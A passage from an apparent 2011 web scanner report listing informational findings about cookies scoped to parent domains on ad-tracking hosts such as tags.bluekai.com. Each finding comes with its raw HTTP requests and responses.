Referer: http://ad.yieldmanager.com/iframe3?gk8AAFU9GAAOhIEAAAAAAN17IwAAAAAAAAAAAAIAAAAAABAAAwAFCRQ-JgAAAAAAtMofAAAAAAAuiC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA-1w8AAAAAAAIAAwAAAAAAPwrXo3A9.j8Mk6mCUUkDQDQzMzMzMwlA30-Nl24SEEBv27Zt27YJQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABtGq5ymMUUCtIQTrGgNDqaPlUrqNI4RJlXze4DAAAAAA==,,http%3A%2F%2Fadserving2.cpxinteractive.com%2Fst%3Fad_type%3Diframe%26ad_size%3D300x250%26section%3D1588565,Z%3D300x250%26anmember%3D541%26anprice%3D300%26s%3D1588565%26_salt%3D2649311919%26B%3D10%26r%3D0,15c8eadc-7c9c-11e0-a0b7-07e40bfd5098
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; dp_rec="{\"1\": 1304954972+ \"3\": 1305125819+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; camp_freq_p1="eJzjkuG48plFgFli68lV71gUGDU+gmgDRgswn0uG4xVY9thxiOy5qxBZMJ9LgmP+YlYBRommzqVg2aZ/J4GyDBYMQJnpH5mBMgc6IDIHPm6By/xdBNLzpQ0i8+U3TI8IR8dGkMyqVpAMgwYDWFSY440zUPDW/yVIgiIcK8+yAp31+wuq6BSgKJPECzTRCx+YgKKPJyxAEf3+DeTA/8/mo4jOvgESfY4meu8AyNwtF369RRZdMR/k3Ml9p1FEd94HmTBr/lqEKADut2xQ"; io_freq_p1="eJzjkuY4HijAJrH15Kp3LAqMGh9BtAGTxbHjQJpLmONNqACjRFPnUqAkgwaDAYMFA1DwqytQ8EAHquATkMovbaiCXeFAwVWtqIIvhYGCt/4vQRG8GiHALPH7C6rgmkgBJokXaIK7rYGCjycsQBFc4AIU/P9sPorgeleg4JYLv94iC24DuXNy32kUwb0uQMFZ89ciBAEFMUmn"; segments_p1="eJwdUM1KAlEYZe6dxeWu5iF6g14jAnVRD+GuJ+gHG7GghIygoB5AcCBEGx0rLDMzFVoFRcH0n2OrciFO59zN4Xw/55zvXi1VIalttdaVWqrDFOAijdpdl1qrWiCdz1ovstHJvwjgWc4ChoGF6aQsHP/t1UxboYB0ugC6BamtfjvE/TFF0Sn5pEXMugxqK9CDMTXbM7CqIujhvgkroTi6CqmrHlEx2GSkW+Hy8iLgNg3o8MrKCUcrGWJ9ROxiWardWdCvY3q8+8yLEgBvCfXQp2fb3JUfUrJnzvAYuxqzfelREs/R2jTiG2qevmn9kwD9CNjeMA+99vlT5aJwSs/BiH8R9mnb2+G0/8fN8yYj3CSglEKdy9BqysjHLMMa83xonVt3pMWG9Q/+LG7L"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 13:33:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 13:33:38 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"610341\": [1305207238+ \"b0014c6f-2597-3289-8efa-b52a4d357226\"+ 12208+ 58117+ 83]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4d4BVgFni2OH171gUGDXuvQXSBowWYD6XBMeVzyxA2a0nVwFlGTQYgDJgNlDmFVjm2HGEDJgNlJm/mFWAUaKpcynYxKZ/J4EmMlgwAGWmf2QGyhzogMgc+LgFLvN3EUjPlzaIzJffMD0iHB0bQTKrWpdC7QGJCnO8cQYK3vq/BElQhGPlWZBXfn9BFZ0CFGWSeIEmeuEDE1D08YQFKKLfv4Ec+P/ZfBTR2TdAos/RRFfMBzlsct/pt8iiO++D1M6avxYhCgAiZ2wN"; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNTEyNjk3Nzg5MSUzQXMyLjMzJTNEJTJDODEzMSUyQzQ0MDElMkMyNzUxJTJDODgwMSUyQzgyIiwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiMTk1IjogWyIwY2JjNWY1Yy1lM2ViLWUxMmQtMmMwNi1lZDdjNDBiMTllOTAiLCB0cnVlXSwgIjE5MSI6IFsiMzcwNjY5MjM0NzUxNTM1NjM1OSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEudY7yrALHHs8Pp3LAoMGgwGjBZgNpc4x/FAATaJrSdXQSWYLI4dB7K5hDnehAowSjR1LoVKMFgwAAW/ugIFD3SgCj4BqfzShirYFQ4UXNWKKvhSGCh46/8SFMGrEUCn/f6CKrgmUoBJ4gWa4G5roODjCQtQBBe4AAX/P5uPIrgN5KTJfaffIgvudQEKzpq/FiEIAH6DSTc="; Domain=invitemedia.com; expires=Fri, 11-May-2012 13:33:58 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
8.75. http://tags.bluekai.com/site/2989  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2989

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2989 HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/
Cookie: bk=EoW7PfNMNpXBvF/1; bkc=KJyfh1M9LabvQKatNik4/JwCWJORCXSwRDcy4lW01cil1MeyKJtWXIDgD4kzaSMXa6ZGdwJgM9p7wWdbLM9yQF7mxwmxIuah3chozPEIXloDdFoDPef/FzMXZ0S1ecz2W4qwr1S9yC4gxrDnPSe0E4LQfGUhtbThGw9MGK87CFnMviaXJiC4G9JPFq6A3g0UmWvdcYXexTx3/TmV6QsQwJ1biw2sMxsaed/4MnISiTaCXtRsO7TBWwITBGCFlRgvObZcXEZOdnlE/4oOfQchD8oHIRTB3cyxeKw71inLOdWOanh20x==; bko=KJhn8sPQmm586oKH9x9mkyv5; bkp1=; bku=qxW99BY4DAtkc89a; bkw4=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101Pfi5+/U9WKROAL=; bkst=KJhMRjeMjVeQRxMv5eqnBYoy2MWmEPgi5+/U9ea4O4x=; bklc=4dca6adb; bkw5=KJhg5tOQuJBGjWCCRsOQjcMo9YJdzxoP1eY6R8P8AzE99991ly3a

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:34:13 GMT
Set-Cookie: bklc=4dcbe1d5; expires=Sat, 14-May-2011 13:34:13 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=QSYgnqNMNpXBvF/1; expires=Tue, 08-Nov-2011 13:34:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJhq0Xl9zJueAKc3y2mIM9y1esrOdJHSOCHIe9rY4yC/gJ5iRni55xgmUT4sObZcXP5p1EOLlLp9yv2hyJKJTqQtisd5iLGc3R4h4lW01cQe8UZXEGnNQdM0kSCXgQoDdGLAPcf8BDSsz8T74PARs1aXjbO80w0xmauI+eQ3dlA2v722viG48a8AdA6EHGSf7QMfjNhMxmsn5Sc0CuoxISj2Ww4YIslUsaeTAPel16w8zjDxwCmDnNYO3+8KWkUKuh0CUTbUQuaYkjaOuyADlAp3/wTqBxRDwLCd1eT71cftEG4yxKSeIY7B3cpcOkxIi/qhzhAH8GcT9YVTiZ6=; expires=Tue, 08-Nov-2011 13:34:13 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:34:13 GMT; path=/; domain=.bluekai.com
BK-Server: 8d9f
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
8.76. http://tags.bluekai.com/site/3307  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3307

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3307?ret=html&phint=Channel%3DSports&phint=SubChannel%3DFight%2520Sports&phint=Place%3DNational&phint=Section%3DFight%2520Sports&phint=WriterTopic%3DFight%2520Sports%2520Examiner&phint=Topic%3DFight%2520Sports&phint=__bk_t%3DComplete%20WWE%20SmackDown%20Spoilers%20for%20Friday%20May%2013th%2C%20New%20'face'%20and%20new%20feuds%20-%20National%20Fight%20Sports%20%7C%20Examiner.com&phint=__bk_k%3DWWE%2C%20WWE%20SmackDown&limit=7&r=32920141 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=tOsYp6BGpSIVIHOf; bkc=KJh56e2n96WxCFc7d/1Z3YetuKWoPCj3oSYWNazZoBOYm46/QGJyvCSiCxC3/pqs0MnRVTPG9+RtRilt9DayJpv8ZtNZIEcF00fqcRwagReALh6axB58pFwaA7D7+Yb5RgyIkwot9nftTq3jrMBFl4RL44VtsyIEXaHdfqFrV4n3hpy6sFOt7lgkhag0b+Wz4nM2PzScr2SJjIZg46zQl/cnG8KIopNnUk6RC2o1xvVzI7LVRXZgWdK4CVJ9FJybwLORXroBBIfmRYoMtSF5PS0bdFkYvhoArm53lggiV4g37y7RK9dRYN+HAqVKS8bk7fU6NEZlKff8+fhccO2qkhJgm5PdJpmxOy==; bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGKcOSP2POAAGuTQCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9aT7/E/=; bkw5=KJppLZD9QZSsW6YuszHARsETpMwOCJaO09TCyTxiTtRwRM5ehjOkpJNh0x99gB61G9==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:33:33 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=foMj7Fd1lTmVIHOf; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh561XgHaWDOdeF2u1pW6GVaZGZKVHkQHPaA8Nb02WLVBeMENYDKLCYnvuyARthA+D6K0LB1tP+/fqstoHupCZ5rKIzpqN2m+dFFq4qb9VVCGefMNgG9eE/yXqBWS4Xqqpu84BBXFubxdprwVaXm3B5efEpHNeZXXPUcze7e7ehbat4NvTjzNIXxzF+9a9owq551rSXIYTek1F90TlllvWt8XVoBwOsXdmW2fS6Rtwril2fQs9EmB+dS7FDZwwiqO2xcc1GncodMDmjXIvRdMmqzTCZFSB5vcBKFWqn2EWyZeewhUxP83kd1kDBm2c5X7Jsrte144awwfebbg95P11zakGrs71dSKbn6pHfrwylFTz5cVM7RtlKhUIqxSPO; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0E8VBQScCytkKPxHnvWZv/aVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EYL4UMSk84CekYLomSQnhBesaY5e4XIGeGq/1LDpwnZCSCMjAiWLkQR3GYt7P0090Cgp1f9L9d19QekGuHu; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5Ae2gPWWDhSz/vsqUaJSORsWf1cdFp96oL38gPa0V5jmDYVXZ1XlYokMKFZe+JNMXYZZY/DN9YNWDWDmSBwA9Pi/t5ZZ2f2ALZKg0mI41w5yk2FWKGd40fGdIWF+1XhNVELSEyt30VU6M2/Ux/hjkAkg/hcDC1pKhzO02Wp0eCZYpa9ZQtdiddF4goY0RhJ6wQjrzn92Y9LzDAA2KsOObdrrDdaKnvIlvJ6JdYENQtQA9PBGTvbttGYlr+EbxFnvXABCGWFlkJZWAKZP9mVDLmv79qpq0ZXUWbz2nxZXJwVxTcOfafRW+7b77CULXBgm+AHGCkcZyBH62b5bL7jwlZn0ggBFoMUg2lScGk5VglQLln4zC5sqEIwHylwH3+IGu2Un+xDCD07A3/dlXppruN231+PQNuvc3FeRfL2ljEFKYIcVfqr/9qnesY37GZA/WpasYe0jQpOehIdLpXF8rNXz+GiN0XLQwx+nza/Qz/yCr1jLzeBGRXsY2dFFAd3NEdxBTeT9O; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpqjLg9T1qjpcYO7RsOizcmAGsOAKWNMfxT9TmUnx1xBemz9Jn1/Yjx8MFwOOBsOiWfC9yEiG0qwRM5eOPekZklRsO/AtCZu9snFUH9tswrMWFwByXQCyFiBARsHZXx0zkNReGe9y9fkhZh; expires=Tue, 08-Nov-2011 13:33:33 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:33:33 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 375
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1183324&t=2" width=1 height=1 border=0 alt="">
<img src="http://sync.mathtag.com/sync/img?m
...[SNIP]...
8.77. http://tags.bluekai.com/site/3319  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3319

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3319?ret=js&phint=site%3D2&phint=ncat%3D6037%3A13616%3A&phint=ptype%3D2100&phint=cid%3D207595&phint=__bk_t%3DCan%20Intel%20Cedar%20Trail%20Atom%20processors%2C%20along%20with%20Google%20Chromebooks%2C%20resurrect%20the%20netbook%3F%20%7C%20ZDNet&phint=__bk_k%3DSean%20Portnoy%2C%20Laptops%20%26%20Desktops%2C%20Google%20Inc.%2CProcessor%2CDarling%2CPity%2CCasualty%2CNetbook%2CIntel%20Corp.%2CAtom%20Processor%2CNetbooks%2C%20Nettops%20%26amp%3B%20MIDs%2CHardware%2CSean%20Portnoy&jscb=cbsiPrepBK&data=all&r=35648740 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0naVHQtYBXyoKH/DT/hgGOa8FWhLeyudrGnydecPTsCovSQf81ev3XWaktOkAIOGRq3ydTvMa/xkZYesa9FEqXITObqR9LDpenZh4YRZJ/CnvRsS39mATrtxsDBVj7RBQcjQW9KkLCUQ==; bkw5=; bkst=KJh5AeNgPWWDC3z/vmbrWP/vyuJkOrqppO0h0nojATMnL38JsqApZVAVBLP02yqgd/nQUf9HxhGCvR/uDDZbBwAB/Mjt+o8fqRJEFqpFzIjXnnepKTpKifrUQyUtZ4x5PAT76dN3rkj2JKrYgODVjjJS01HN/E1lLU9zFH1XQTjQLhxJGB4yUdfhmiAnJ7c7xI9ZJXreA19hCKuEaySWwFohEwpNfjjtXHBjFXkSR+GJ9aESmYr++39+fgqwva8LlSoT6kx1VAtaAKiP9KVDLKYA9gdVh/K+KLDc322/F0U2imaG5OO4eVt83qRv2lHi8C+MBDRGXlOMBkfFdP7IumyfRCI0UgzdfQ2tH3J4Pidfp2tL49tCm8dajdrEj3OmrI8K52DKCWuk7vzooedb2Rci8x8MqPRBDbibqXpt4sKIlqLidbjEEI/9qnesY37GMW/WpasYe0jQpOehIIAJLEXf2PVnS/rzwwv2AexlOuncY/JqpYRcQpRslc+zddlId7XlIQrc+7ru; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101EbdIJxF9Wk5O+x=; bklc=4dcbc695; bk=JzUPJLV5c/sVIHOf; bkc=KJh5pM2nxkWRhdcFfxIoSYermUH+qcO111n8MGjeezv+k09ROnKi0uSCUvxkZhpalDALQISVUAeTYQvCXhiw28bpw/4wKUTdprkFy1XPwWl7Qx46MEXmqzX57tlaFMeMBxdMy4FS9XKuPyXp1OgO86FL0gN+0S+ES4QtIXKWqN3t/X4uP02lynIWfrlqtFrmJSdK06sM8asFhPTzRa70biCgfGGKTPcLXOgnAkzlpUMrxYaCtSFBDNHBdbWXYpqjUFA6RfFrVwg3lN6TddJGIfmQ0wcvez4uENgbbgEjEUgdkFI/ypFqJ8a+m5PdLuPlcQ==; bkdc=res

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:28:44 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=8adNDrWG8QtVIHOf; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56q2n9pWRhFaFd/st3YerfK9oEQf3ov9D8hLgcK3Q7wTJQGJyvQ8iOhcDHPhLJX4ifiuNnEifinmTayEOFv4oljLkTzwfwYxAFEaRleqDwM3C9UgVz8TFkgufQUqoemU3Dmgq94QXQmF7NBN8fR87bEFFtvDhYRdN5+2Np8Jl4LCeLyZF2bkUEgDkfp0SQlzfFXgTSWXf2ih288XHYcqCXFikft7wA7zrMWBkhkOKEd6NifnA7Vwf7GVi/PomcHtinc77nqFz7zBDhMJl+AKhSFrNCPRT0ceiMqhttUw07ddI7GeBBXBI693ngYVrKJjIN+Jlp+7j6Xt48EfibWufasFnfFyntpmxEy==; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0naVHQtYBXyoKH/DT/hgGOaNwkCqeRsuSh1EeX6Mf30XByO0CVD7wxkTkOkGIOGK4OSPXPOAAGu8QCevMUC7X4DvXBAsDvj77pxkC1e/kxaMBeaPec0uDfQnnsf9y1IX9L9sEa/DG=; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJhfSX19O161JT9A1TMJy1My7VKYYumeAONYCCaahL6KhsbsiicnZeFMAQW9fZyBxx==; expires=Tue, 08-Nov-2011 13:28:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Fri, 13-May-2011 13:28:44 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 637
Content-Type: text/javascript
Connection: keep-alive

cbsiPrepBK(
{
"campaigns": [
{
"campaign": 17207,
"timestamp": 1305206924,
"categories": [
{
"categoryID": 78992,
"timestamp": 1305206924
}
]
},
{
"campaign": 1
...[SNIP]...
8.78. http://tags.bluekai.com/site/450  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/450

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/450 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
